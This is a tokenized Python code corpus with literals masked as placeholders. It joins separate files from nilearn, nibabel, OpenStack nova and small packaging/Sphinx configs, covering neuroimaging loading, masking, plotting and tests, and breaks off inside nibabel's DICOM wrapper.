self . got_exception = False <EOL> def start ( self ) : <EOL> self . done = event . Event ( ) <EOL> def _inner ( ) : <EOL> """<STR_LIT>""" <EOL> self . _running = True <EOL> while self . _running : <EOL> try : <EOL> data = self . input . read ( None ) <EOL> if not data : <EOL> self . stop ( ) <EOL> self . done . send ( True ) <EOL> self . output . write ( data ) <EOL> greenthread . sleep ( IO_THREAD_SLEEP_TIME ) <EOL> except Exception , exc : <EOL> self . stop ( ) <EOL> LOG . exception ( exc ) <EOL> self . done . send_exception ( exc ) <EOL> greenthread . spawn ( _inner ) <EOL> return self . done <EOL> def stop ( self ) : <EOL> self . _running = False <EOL> def wait ( self ) : <EOL> return self . done . wait ( ) </s>
<s> from nova . vsa . api import API </s>
<s> """<STR_LIT>""" <EOL> import sys <EOL> from floyd . core . command_utils import run_cl <EOL> run_cl ( sys . argv ) </s>
<s> """<STR_LIT>""" <EOL> from nilearn import datasets <EOL> netmats = datasets . fetch_megatrawls_netmats ( dimensionality = <NUM_LIT> , <EOL> timeseries = '<STR_LIT>' , <EOL> matrices = '<STR_LIT>' ) <EOL> partial_correlation = netmats . correlation_matrices <EOL> import matplotlib . pyplot as plt <EOL> from nilearn import plotting <EOL> title = "<STR_LIT>" <EOL> plt . figure ( ) <EOL> plt . imshow ( partial_correlation , interpolation = "<STR_LIT>" , cmap = plotting . cm . bwr ) <EOL> plt . colorbar ( ) <EOL> plt . title ( title ) <EOL> plt . show ( ) </s>
<s> """<STR_LIT>""" <EOL> from nilearn import datasets <EOL> dataset = datasets . fetch_adhd ( n_subjects = <NUM_LIT:2> ) <EOL> print ( '<STR_LIT>' % dataset . func [ <NUM_LIT:0> ] ) <EOL> print ( '<STR_LIT>' % dataset . func [ <NUM_LIT:1> ] ) <EOL> from nilearn import plotting , image <EOL> result_img = image . math_img ( "<STR_LIT>" , <EOL> img1 = dataset . func [ <NUM_LIT:0> ] , <EOL> img2 = dataset . func [ <NUM_LIT:1> ] ) <EOL> plotting . plot_stat_map ( result_img , <EOL> title = "<STR_LIT>" ) <EOL> plotting . show ( ) </s>
<s> """<STR_LIT>""" <EOL> import copy <EOL> import gc <EOL> import collections <EOL> import numpy as np <EOL> import nibabel <EOL> from . compat import _basestring <EOL> def _safe_get_data ( img ) : <EOL> """<STR_LIT>""" <EOL> if hasattr ( img , '<STR_LIT>' ) and img . _data_cache is None : <EOL> img = copy . deepcopy ( img ) <EOL> gc . collect ( ) <EOL> return img . get_data ( ) <EOL> def _get_data_dtype ( img ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> return img . get_data_dtype ( ) <EOL> except AttributeError : <EOL> return img . get_data ( ) . dtype <EOL> def _get_target_dtype ( dtype , target_dtype ) : <EOL> """<STR_LIT>""" <EOL> if target_dtype is None : <EOL> return None <EOL> if target_dtype == '<STR_LIT>' : <EOL> if dtype . kind == '<STR_LIT:i>' : <EOL> target_dtype = np . int32 <EOL> else : <EOL> target_dtype = np . float32 <EOL> if target_dtype == dtype : <EOL> return None <EOL> return target_dtype <EOL> def load_niimg ( niimg , dtype = None ) : <EOL> """<STR_LIT>""" <EOL> from . . image import new_img_like <EOL> if isinstance ( niimg , _basestring ) : <EOL> niimg = nibabel . load ( niimg ) <EOL> elif not isinstance ( niimg , nibabel . spatialimages . SpatialImage ) : <EOL> raise TypeError ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> + short_repr ( niimg ) ) <EOL> dtype = _get_target_dtype ( _get_data_dtype ( niimg ) , dtype ) <EOL> if dtype is not None : <EOL> niimg = new_img_like ( niimg , niimg . get_data ( ) . astype ( dtype ) , <EOL> niimg . get_affine ( ) ) <EOL> return niimg <EOL> def copy_img ( img ) : <EOL> """<STR_LIT>""" <EOL> from . . image import new_img_like <EOL> if not isinstance ( img , nibabel . spatialimages . SpatialImage ) : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> return new_img_like ( img , _safe_get_data ( img ) . copy ( ) , img . get_affine ( ) . 
copy ( ) , <EOL> copy_header = True ) <EOL> def _repr_niimgs ( niimgs ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( niimgs , _basestring ) : <EOL> return niimgs <EOL> if isinstance ( niimgs , collections . Iterable ) : <EOL> return '<STR_LIT>' % '<STR_LIT:U+002CU+0020>' . join ( _repr_niimgs ( niimg ) for niimg in niimgs ) <EOL> try : <EOL> filename = niimgs . get_filename ( ) <EOL> if filename is not None : <EOL> return "<STR_LIT>" % ( niimgs . __class__ . __name__ , <EOL> filename ) <EOL> else : <EOL> return "<STR_LIT>" % ( niimgs . __class__ . __name__ , <EOL> repr ( niimgs . shape ) , <EOL> repr ( niimgs . get_affine ( ) ) ) <EOL> except : <EOL> pass <EOL> return repr ( niimgs ) <EOL> def short_repr ( niimg ) : <EOL> """<STR_LIT>""" <EOL> this_repr = _repr_niimgs ( niimg ) <EOL> if len ( this_repr ) > <NUM_LIT:20> : <EOL> this_repr = this_repr [ : <NUM_LIT> ] + '<STR_LIT>' <EOL> return this_repr </s>
<s> from nose . tools import assert_equal , assert_true <EOL> import numpy as np <EOL> from nilearn . decoding . fista import mfista <EOL> from nilearn . decoding . proximal_operators import _prox_l1 <EOL> from nilearn . decoding . objective_functions import ( <EOL> _squared_loss , <EOL> _logistic , <EOL> _squared_loss_grad , <EOL> _logistic_loss_lipschitz_constant , <EOL> spectral_norm_squared ) <EOL> from nilearn . decoding . fista import _check_lipschitz_continuous <EOL> def test_logistic_lipschitz ( n_samples = <NUM_LIT:4> , n_features = <NUM_LIT:2> , random_state = <NUM_LIT> ) : <EOL> rng = np . random . RandomState ( random_state ) <EOL> for scaling in np . logspace ( - <NUM_LIT:3> , <NUM_LIT:3> , num = <NUM_LIT:7> ) : <EOL> X = rng . randn ( n_samples , n_features ) * scaling <EOL> y = rng . randn ( n_samples ) <EOL> n_features = X . shape [ <NUM_LIT:1> ] <EOL> L = _logistic_loss_lipschitz_constant ( X ) <EOL> _check_lipschitz_continuous ( lambda w : _logistic ( <EOL> X , y , w ) , n_features + <NUM_LIT:1> , L ) <EOL> def test_squared_loss_lipschitz ( n_samples = <NUM_LIT:4> , n_features = <NUM_LIT:2> , random_state = <NUM_LIT> ) : <EOL> rng = np . random . RandomState ( random_state ) <EOL> for scaling in np . logspace ( - <NUM_LIT:3> , <NUM_LIT:3> , num = <NUM_LIT:7> ) : <EOL> X = rng . randn ( n_samples , n_features ) * scaling <EOL> y = rng . randn ( n_samples ) <EOL> n_features = X . shape [ <NUM_LIT:1> ] <EOL> L = spectral_norm_squared ( X ) <EOL> _check_lipschitz_continuous ( lambda w : _squared_loss_grad ( <EOL> X , y , w ) , n_features , L ) <EOL> def test_input_args_and_kwargs ( ) : <EOL> rng = np . random . RandomState ( <NUM_LIT> ) <EOL> p = <NUM_LIT> <EOL> noise_std = <NUM_LIT> <EOL> sig = np . 
zeros ( p ) <EOL> sig [ [ <NUM_LIT:0> , <NUM_LIT:2> , <NUM_LIT> , <NUM_LIT:4> , <NUM_LIT> , <NUM_LIT:32> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , - <NUM_LIT:1> ] ] = <NUM_LIT:1> <EOL> sig [ : <NUM_LIT:6> ] = <NUM_LIT:2> <EOL> sig [ - <NUM_LIT:7> : ] = <NUM_LIT:2> <EOL> sig [ <NUM_LIT> : <NUM_LIT> ] = <NUM_LIT:1> <EOL> y = sig + noise_std * rng . randn ( * sig . shape ) <EOL> X = np . eye ( p ) <EOL> mask = np . ones ( ( p , ) ) . astype ( np . bool ) <EOL> alpha = <NUM_LIT> <EOL> alpha_ = alpha * X . shape [ <NUM_LIT:0> ] <EOL> l1_ratio = <NUM_LIT> <EOL> l1_weight = alpha_ * l1_ratio <EOL> f1 = lambda w : _squared_loss ( X , y , w , compute_grad = False ) <EOL> f1_grad = lambda w : _squared_loss ( X , y , w , compute_grad = True , <EOL> compute_energy = False ) <EOL> f2_prox = lambda w , l , * args , ** kwargs : ( _prox_l1 ( w , l * l1_weight ) , <EOL> dict ( converged = True ) ) <EOL> total_energy = lambda w : f1 ( w ) + l1_weight * np . sum ( np . abs ( w ) ) <EOL> for cb_retval in [ <NUM_LIT:0> , <NUM_LIT:1> ] : <EOL> for verbose in [ <NUM_LIT:0> , <NUM_LIT:1> ] : <EOL> for dgap_factor in [ <NUM_LIT:1.> , None ] : <EOL> best_w , objective , init = mfista ( <EOL> f1_grad , f2_prox , total_energy , <NUM_LIT:1.> , p , <EOL> dgap_factor = dgap_factor , <EOL> callback = lambda _ : cb_retval , verbose = verbose , <EOL> max_iter = <NUM_LIT:100> ) <EOL> assert_equal ( best_w . shape , mask . shape ) <EOL> assert_true ( isinstance ( objective , list ) ) <EOL> assert_true ( isinstance ( init , dict ) ) <EOL> for key in [ "<STR_LIT:w>" , "<STR_LIT:t>" , "<STR_LIT>" , "<STR_LIT>" ] : <EOL> assert_true ( key in init ) </s>
<s> """<STR_LIT>""" <EOL> import numpy as np <EOL> from sklearn . externals . joblib import Memory <EOL> from . . import _utils <EOL> from . . _utils import logger , CacheMixin <EOL> from . . _utils . niimg import _get_data_dtype <EOL> from . . _utils . class_inspect import get_params <EOL> from . . _utils . niimg_conversions import _check_same_fov <EOL> from . . import image <EOL> from . base_masker import filter_and_extract , BaseMasker <EOL> class _ExtractionFunctor ( object ) : <EOL> func_name = '<STR_LIT>' <EOL> def __init__ ( self , _resampled_maps_img_ , _resampled_mask_img_ ) : <EOL> self . _resampled_maps_img_ = _resampled_maps_img_ <EOL> self . _resampled_mask_img_ = _resampled_mask_img_ <EOL> def __call__ ( self , imgs ) : <EOL> from . . regions import signal_extraction <EOL> return signal_extraction . img_to_signals_maps ( <EOL> imgs , self . _resampled_maps_img_ , <EOL> mask_img = self . _resampled_mask_img_ ) <EOL> class NiftiMapsMasker ( BaseMasker , CacheMixin ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , maps_img , mask_img = None , <EOL> allow_overlap = True , <EOL> smoothing_fwhm = None , standardize = False , detrend = False , <EOL> low_pass = None , high_pass = None , t_r = None , <EOL> resampling_target = "<STR_LIT:data>" , <EOL> memory = Memory ( cachedir = None , verbose = <NUM_LIT:0> ) , memory_level = <NUM_LIT:0> , <EOL> verbose = <NUM_LIT:0> ) : <EOL> self . maps_img = maps_img <EOL> self . mask_img = mask_img <EOL> self . allow_overlap = allow_overlap <EOL> self . smoothing_fwhm = smoothing_fwhm <EOL> self . standardize = standardize <EOL> self . detrend = detrend <EOL> self . low_pass = low_pass <EOL> self . high_pass = high_pass <EOL> self . t_r = t_r <EOL> self . resampling_target = resampling_target <EOL> self . memory = memory <EOL> self . memory_level = memory_level <EOL> self . 
verbose = verbose <EOL> if resampling_target not in ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT:data>" , None ) : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" + str ( resampling_target ) ) <EOL> if self . mask_img is None and resampling_target == "<STR_LIT>" : <EOL> raise ValueError ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> def fit ( self , X = None , y = None ) : <EOL> """<STR_LIT>""" <EOL> logger . log ( "<STR_LIT>" % <EOL> _utils . _repr_niimgs ( self . maps_img ) [ : <NUM_LIT:200> ] , <EOL> verbose = self . verbose ) <EOL> self . maps_img_ = _utils . check_niimg_4d ( self . maps_img ) <EOL> if self . mask_img is not None : <EOL> logger . log ( "<STR_LIT>" % <EOL> _utils . _repr_niimgs ( self . mask_img ) [ : <NUM_LIT:200> ] , <EOL> verbose = self . verbose ) <EOL> self . mask_img_ = _utils . check_niimg_3d ( self . mask_img ) <EOL> else : <EOL> self . mask_img_ = None <EOL> if self . resampling_target is None and self . mask_img_ is not None : <EOL> _check_same_fov ( mask = self . mask_img_ , maps = self . maps_img_ , <EOL> raise_error = True ) <EOL> elif self . resampling_target == "<STR_LIT>" and self . mask_img_ is not None : <EOL> if self . verbose > <NUM_LIT:0> : <EOL> print ( "<STR_LIT>" ) <EOL> self . maps_img_ = image . resample_img ( <EOL> self . maps_img_ , <EOL> target_affine = self . mask_img_ . get_affine ( ) , <EOL> target_shape = self . mask_img_ . shape , <EOL> interpolation = "<STR_LIT>" , <EOL> copy = True ) <EOL> elif self . resampling_target == "<STR_LIT>" and self . mask_img_ is not None : <EOL> if self . verbose > <NUM_LIT:0> : <EOL> print ( "<STR_LIT>" ) <EOL> self . mask_img_ = image . resample_img ( <EOL> self . mask_img_ , <EOL> target_affine = self . maps_img_ . get_affine ( ) , <EOL> target_shape = self . maps_img_ . 
shape [ : <NUM_LIT:3> ] , <EOL> interpolation = "<STR_LIT>" , <EOL> copy = True ) <EOL> return self <EOL> def _check_fitted ( self ) : <EOL> if not hasattr ( self , "<STR_LIT>" ) : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> % self . __class__ . __name__ ) <EOL> def fit_transform ( self , imgs , confounds = None ) : <EOL> """<STR_LIT>""" <EOL> return self . fit ( ) . transform ( imgs , confounds = confounds ) <EOL> def transform_single_imgs ( self , imgs , confounds = None ) : <EOL> """<STR_LIT>""" <EOL> if not hasattr ( self , '<STR_LIT>' ) : <EOL> self . _resampled_maps_img_ = self . maps_img_ <EOL> if not hasattr ( self , '<STR_LIT>' ) : <EOL> self . _resampled_mask_img_ = self . mask_img_ <EOL> if self . resampling_target is None : <EOL> imgs_ = _utils . check_niimg_4d ( imgs ) <EOL> images = dict ( maps = self . maps_img_ , data = imgs_ ) <EOL> if self . mask_img_ is not None : <EOL> images [ '<STR_LIT>' ] = self . mask_img_ <EOL> _check_same_fov ( raise_error = True , ** images ) <EOL> else : <EOL> if self . resampling_target == "<STR_LIT:data>" : <EOL> imgs_ = _utils . check_niimg_4d ( imgs ) <EOL> ref_img = imgs_ <EOL> elif self . resampling_target == "<STR_LIT>" : <EOL> self . _resampled_mask_img_ = self . mask_img_ <EOL> ref_img = self . mask_img_ <EOL> elif self . resampling_target == "<STR_LIT>" : <EOL> self . _resampled_maps_img_ = self . maps_img_ <EOL> ref_img = self . maps_img_ <EOL> if not _check_same_fov ( ref_img , self . _resampled_maps_img_ ) : <EOL> if self . verbose > <NUM_LIT:0> : <EOL> print ( "<STR_LIT>" ) <EOL> self . _resampled_maps_img_ = self . _cache ( image . resample_img ) ( <EOL> self . maps_img_ , interpolation = "<STR_LIT>" , <EOL> target_shape = ref_img . shape [ : <NUM_LIT:3> ] , <EOL> target_affine = ref_img . get_affine ( ) ) <EOL> if ( self . mask_img_ is not None and <EOL> not _check_same_fov ( ref_img , self . mask_img_ ) ) : <EOL> if self . verbose > <NUM_LIT:0> : <EOL> print ( "<STR_LIT>" ) <EOL> self . 
_resampled_mask_img_ = self . _cache ( image . resample_img ) ( <EOL> self . mask_img_ , interpolation = "<STR_LIT>" , <EOL> target_shape = ref_img . shape [ : <NUM_LIT:3> ] , <EOL> target_affine = ref_img . get_affine ( ) ) <EOL> if not self . allow_overlap : <EOL> dtype = _get_data_dtype ( self . _resampled_maps_img_ ) <EOL> data = self . _resampled_maps_img_ . get_data ( ) <EOL> if dtype . kind == '<STR_LIT:f>' : <EOL> data [ data < np . finfo ( dtype ) . eps ] = <NUM_LIT:0.> <EOL> if np . any ( np . sum ( data > <NUM_LIT:0.> , axis = <NUM_LIT:3> ) > <NUM_LIT:1> ) : <EOL> raise ValueError ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> target_shape = None <EOL> target_affine = None <EOL> if self . resampling_target != '<STR_LIT:data>' : <EOL> target_shape = self . _resampled_maps_img_ . shape [ : <NUM_LIT:3> ] <EOL> target_affine = self . _resampled_maps_img_ . get_affine ( ) <EOL> params = get_params ( NiftiMapsMasker , self , <EOL> ignore = [ '<STR_LIT>' ] ) <EOL> params [ '<STR_LIT>' ] = target_shape <EOL> params [ '<STR_LIT>' ] = target_affine <EOL> region_signals , labels_ = self . _cache ( <EOL> filter_and_extract , ignore = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) ( <EOL> imgs , _ExtractionFunctor ( self . _resampled_maps_img_ , <EOL> self . _resampled_mask_img_ ) , <EOL> params , <EOL> confounds = confounds , <EOL> memory = self . memory , <EOL> memory_level = self . memory_level , <EOL> verbose = self . verbose ) <EOL> self . labels_ = labels_ <EOL> return region_signals <EOL> def inverse_transform ( self , region_signals ) : <EOL> """<STR_LIT>""" <EOL> from . . regions import signal_extraction <EOL> self . _check_fitted ( ) <EOL> logger . log ( "<STR_LIT>" , verbose = self . verbose ) <EOL> return signal_extraction . signals_to_img_maps ( <EOL> region_signals , self . maps_img_ , mask_img = self . mask_img_ ) </s>
<s> """<STR_LIT>""" <EOL> from . region_extractor import connected_regions , RegionExtractor <EOL> from . signal_extraction import ( <EOL> img_to_signals_labels , signals_to_img_labels , <EOL> img_to_signals_maps , signals_to_img_maps , <EOL> ) <EOL> __all__ = [ <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> ] </s>
<s> import sys <EOL> import os <EOL> execfile ( '<STR_LIT>' ) <EOL> on_rtd = os . environ . get ( '<STR_LIT>' , None ) == '<STR_LIT:True>' <EOL> if not on_rtd : <EOL> import sphinx_rtd_theme <EOL> html_theme = '<STR_LIT>' <EOL> html_theme_path = [ sphinx_rtd_theme . get_html_theme_path ( ) ] <EOL> else : <EOL> html_theme = '<STR_LIT:default>' <EOL> extensions = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] <EOL> templates_path = [ '<STR_LIT>' ] <EOL> source_suffix = '<STR_LIT>' <EOL> master_doc = '<STR_LIT:index>' <EOL> project = u'<STR_LIT>' <EOL> copyright = u'<STR_LIT>' <EOL> version = __version__ <EOL> release = __version__ <EOL> exclude_patterns = [ '<STR_LIT>' ] <EOL> pygments_style = '<STR_LIT>' <EOL> html_static_path = [ '<STR_LIT>' ] <EOL> htmlhelp_basename = '<STR_LIT>' <EOL> latex_elements = { <EOL> } <EOL> latex_documents = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> u'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> man_pages = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> [ u'<STR_LIT>' ] , <NUM_LIT:1> ) <EOL> ] <EOL> texinfo_documents = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> u'<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) , <EOL> ] <EOL> numpydoc_show_class_members = False </s>
<s> from videocore import __version__ <EOL> from distutils . core import setup <EOL> setup ( name = '<STR_LIT>' , <EOL> version = __version__ , <EOL> description = '<STR_LIT>' , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> url = '<STR_LIT>' , <EOL> packages = [ '<STR_LIT>' ] <EOL> ) </s>
<s> """<STR_LIT>""" <EOL> import warnings <EOL> from . volumeutils import array_from_file , apply_read_scaling <EOL> from . fileslice import fileslice <EOL> from . keywordonly import kw_only_meth <EOL> from . openers import ImageOpener <EOL> class ArrayProxy ( object ) : <EOL> """<STR_LIT>""" <EOL> order = '<STR_LIT:F>' <EOL> @ kw_only_meth ( <NUM_LIT:2> ) <EOL> def __init__ ( self , file_like , header , mmap = True ) : <EOL> """<STR_LIT>""" <EOL> if mmap not in ( True , False , '<STR_LIT:c>' , '<STR_LIT:r>' ) : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> self . file_like = file_like <EOL> self . _shape = header . get_data_shape ( ) <EOL> self . _dtype = header . get_data_dtype ( ) <EOL> self . _offset = header . get_data_offset ( ) <EOL> self . _slope , self . _inter = header . get_slope_inter ( ) <EOL> self . _slope = <NUM_LIT:1.0> if self . _slope is None else self . _slope <EOL> self . _inter = <NUM_LIT:0.0> if self . _inter is None else self . _inter <EOL> self . _mmap = mmap <EOL> self . _header = header . copy ( ) <EOL> @ property <EOL> def header ( self ) : <EOL> warnings . warn ( '<STR_LIT>' , <EOL> FutureWarning , <EOL> stacklevel = <NUM_LIT:2> ) <EOL> return self . _header <EOL> @ property <EOL> def shape ( self ) : <EOL> return self . _shape <EOL> @ property <EOL> def is_proxy ( self ) : <EOL> return True <EOL> @ property <EOL> def slope ( self ) : <EOL> return self . _slope <EOL> @ property <EOL> def inter ( self ) : <EOL> return self . _inter <EOL> @ property <EOL> def offset ( self ) : <EOL> return self . _offset <EOL> def get_unscaled ( self ) : <EOL> '''<STR_LIT>''' <EOL> with ImageOpener ( self . file_like ) as fileobj : <EOL> raw_data = array_from_file ( self . _shape , <EOL> self . _dtype , <EOL> fileobj , <EOL> offset = self . _offset , <EOL> order = self . order , <EOL> mmap = self . _mmap ) <EOL> return raw_data <EOL> def __array__ ( self ) : <EOL> raw_data = self . get_unscaled ( ) <EOL> return apply_read_scaling ( raw_data , self . 
_slope , self . _inter ) <EOL> def __getitem__ ( self , slicer ) : <EOL> with ImageOpener ( self . file_like ) as fileobj : <EOL> raw_data = fileslice ( fileobj , <EOL> slicer , <EOL> self . _shape , <EOL> self . _dtype , <EOL> self . _offset , <EOL> order = self . order ) <EOL> return apply_read_scaling ( raw_data , self . _slope , self . _inter ) <EOL> def is_proxy ( obj ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> return obj . is_proxy <EOL> except AttributeError : <EOL> return False </s>
<s> """<STR_LIT>""" <EOL> def read_zt_byte_strings ( fobj , n_strings = <NUM_LIT:1> , bufsize = <NUM_LIT> ) : <EOL> """<STR_LIT>""" <EOL> byte_strings = [ ] <EOL> trailing = b'<STR_LIT>' <EOL> while True : <EOL> buf = fobj . read ( bufsize ) <EOL> eof = len ( buf ) < bufsize <EOL> zt_strings = buf . split ( b'<STR_LIT:\x00>' ) <EOL> if len ( zt_strings ) > <NUM_LIT:1> : <EOL> byte_strings += [ trailing + zt_strings [ <NUM_LIT:0> ] ] + zt_strings [ <NUM_LIT:1> : - <NUM_LIT:1> ] <EOL> trailing = zt_strings [ - <NUM_LIT:1> ] <EOL> else : <EOL> trailing += zt_strings [ <NUM_LIT:0> ] <EOL> n_found = len ( byte_strings ) <EOL> if eof or n_found >= n_strings : <EOL> break <EOL> if n_found < n_strings : <EOL> raise ValueError ( '<STR_LIT>' . format ( <EOL> n_strings , n_found ) ) <EOL> n_extra = n_found - n_strings <EOL> leftover_strings = byte_strings [ n_strings : ] + [ trailing ] <EOL> extra_bytes = sum ( len ( bs ) for bs in leftover_strings ) + n_extra <EOL> fobj . seek ( - extra_bytes , <NUM_LIT:1> ) <EOL> return byte_strings [ : n_strings ] </s>
<s> """<STR_LIT>""" <EOL> from __future__ import division <EOL> import operator <EOL> import numpy as np <EOL> from . import csareader as csar <EOL> from . dwiparams import B2q , nearest_pos_semi_def , q2bg <EOL> from . . openers import ImageOpener <EOL> from . . onetime import setattr_on_read as one_time <EOL> from . . pydicom_compat import pydicom <EOL> class WrapperError ( Exception ) : <EOL> pass <EOL> class WrapperPrecisionError ( WrapperError ) : <EOL> pass <EOL> def wrapper_from_file ( file_like , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> from . . pydicom_compat import read_file <EOL> with ImageOpener ( file_like ) as fobj : <EOL> dcm_data = read_file ( fobj , * args , ** kwargs ) <EOL> return wrapper_from_data ( dcm_data ) <EOL> def wrapper_from_data ( dcm_data ) : <EOL> """<STR_LIT>""" <EOL> sop_class = dcm_data . get ( '<STR_LIT>' ) <EOL> if sop_class == '<STR_LIT>' : <EOL> return MultiframeWrapper ( dcm_data ) <EOL> csa = csar . get_csa_header ( dcm_data ) <EOL> if csa is None : <EOL> return Wrapper ( dcm_data ) <EOL> if csar . is_mosaic ( csa ) : <EOL> return MosaicWrapper ( dcm_data , csa ) <EOL> return SiemensWrapper ( dcm_data , csa ) <EOL> class Wrapper ( object ) : <EOL> """<STR_LIT>""" <EOL> is_csa = False <EOL> is_mosaic = False <EOL> is_multiframe = False <EOL> b_matrix = None <EOL> q_vector = None <EOL> b_value = None <EOL> b_vector = None <EOL> def __init__ ( self , dcm_data ) : <EOL> """<STR_LIT>""" <EOL> self . dcm_data = dcm_data <EOL> @ one_time <EOL> def image_shape ( self ) : <EOL> """<STR_LIT>""" <EOL> shape = ( self . get ( '<STR_LIT>' ) , self . get ( '<STR_LIT>' ) ) <EOL> if None in shape : <EOL> return None <EOL> return shape <EOL> @ one_time <EOL> def image_orient_patient ( self ) : <EOL> """<STR_LIT>""" <EOL> iop = self . get ( '<STR_LIT>' ) <EOL> if iop is None : <EOL> return None <EOL> iop = np . array ( list ( map ( float , iop ) ) ) <EOL> return np . array ( iop ) . reshape ( <NUM_LIT:2> , <NUM_LIT:3> ) . 
T <EOL> @ one_time <EOL> def slice_normal ( self ) : <EOL> iop = self . image_orient_patient <EOL> if iop is None : <EOL> return None <EOL> return np . cross ( iop [ : , <NUM_LIT:1> ] , iop [ : , <NUM_LIT:0> ] ) <EOL> @ one_time <EOL> def rotation_matrix ( self ) : <EOL> """<STR_LIT>""" <EOL> iop = self . image_orient_patient <EOL> s_norm = self . slice_normal <EOL> if iop is None or s_norm is None : <EOL> return None <EOL> R = np . eye ( <NUM_LIT:3> ) <EOL> R [ : , : <NUM_LIT:2> ] = np . fliplr ( iop ) <EOL> R [ : , <NUM_LIT:2> ] = s_norm <EOL> if not np . allclose ( np . eye ( <NUM_LIT:3> ) , np . dot ( R , R . T ) , atol = <NUM_LIT> ) : <EOL> raise WrapperPrecisionError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> return R <EOL> @ one_time <EOL> def voxel_sizes ( self ) : <EOL> """<STR_LIT>""" <EOL> pix_space = self . get ( '<STR_LIT>' ) <EOL> if pix_space is None : <EOL> return None <EOL> zs = self . get ( '<STR_LIT>' ) <EOL> if zs is None : <EOL> zs = self . get ( '<STR_LIT>' ) <EOL> if zs is None : <EOL> zs = <NUM_LIT:1> <EOL> zs = float ( zs ) <EOL> pix_space = list ( map ( float , pix_space ) ) <EOL> return tuple ( pix_space + [ zs ] ) <EOL> @ one_time <EOL> def image_position ( self ) : <EOL> """<STR_LIT>""" <EOL> ipp = self . get ( '<STR_LIT>' ) <EOL> if ipp is None : <EOL> return None <EOL> return np . array ( list ( map ( float , ipp ) ) ) <EOL> @ one_time <EOL> def slice_indicator ( self ) : <EOL> """<STR_LIT>""" <EOL> ipp = self . image_position <EOL> s_norm = self . slice_normal <EOL> if ipp is None or s_norm is None : <EOL> return None <EOL> return np . inner ( ipp , s_norm ) <EOL> @ one_time <EOL> def instance_number ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . get ( '<STR_LIT>' ) <EOL> @ one_time <EOL> def series_signature ( self ) : <EOL> """<STR_LIT>""" <EOL> signature = { } <EOL> eq = operator . 
eq <EOL> for key in ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) : <EOL> signature [ key ] = ( self . get ( key ) , eq ) <EOL> signature [ '<STR_LIT>' ] = ( self . image_shape , eq ) <EOL> signature [ '<STR_LIT>' ] = ( self . image_orient_patient , none_or_close ) <EOL> signature [ '<STR_LIT>' ] = ( self . voxel_sizes , none_or_close ) <EOL> return signature <EOL> def __getitem__ ( self , key ) : <EOL> """<STR_LIT>""" <EOL> if key not in self . dcm_data : <EOL> raise KeyError ( '<STR_LIT>' % key ) <EOL> return self . dcm_data . get ( key ) <EOL> def get ( self , key , default = None ) : <EOL> """<STR_LIT>""" <EOL> return self . dcm_data . get ( key , default ) <EOL> def get_affine ( self ) : <EOL> """<STR_LIT>""" <EOL> orient = self . rotation_matrix <EOL> vox = self . voxel_sizes <EOL> ipp = self . image_position <EOL> if any ( p is None for p in ( orient , vox , ipp ) ) : <EOL> raise WrapperError ( '<STR_LIT>' ) <EOL> aff = np . eye ( <NUM_LIT:4> ) <EOL> aff [ : <NUM_LIT:3> , : <NUM_LIT:3> ] = orient * np . array ( vox ) <EOL> aff [ : <NUM_LIT:3> , <NUM_LIT:3> ] = ipp <EOL> return aff <EOL> def get_pixel_array ( self ) : <EOL> """<STR_LIT>""" <EOL> data = self . dcm_data . get ( '<STR_LIT>' ) <EOL> if data is None : <EOL> raise WrapperError ( '<STR_LIT>' ) <EOL> return data <EOL> def get_data ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _scale_data ( self . get_pixel_array ( ) ) <EOL> def is_same_series ( self , other ) : <EOL> """<STR_LIT>""" <EOL> my_sig = self . series_signature <EOL> your_sig = other . series_signature <EOL> my_keys = set ( my_sig ) <EOL> your_keys = set ( your_sig ) <EOL> for key in my_keys . 
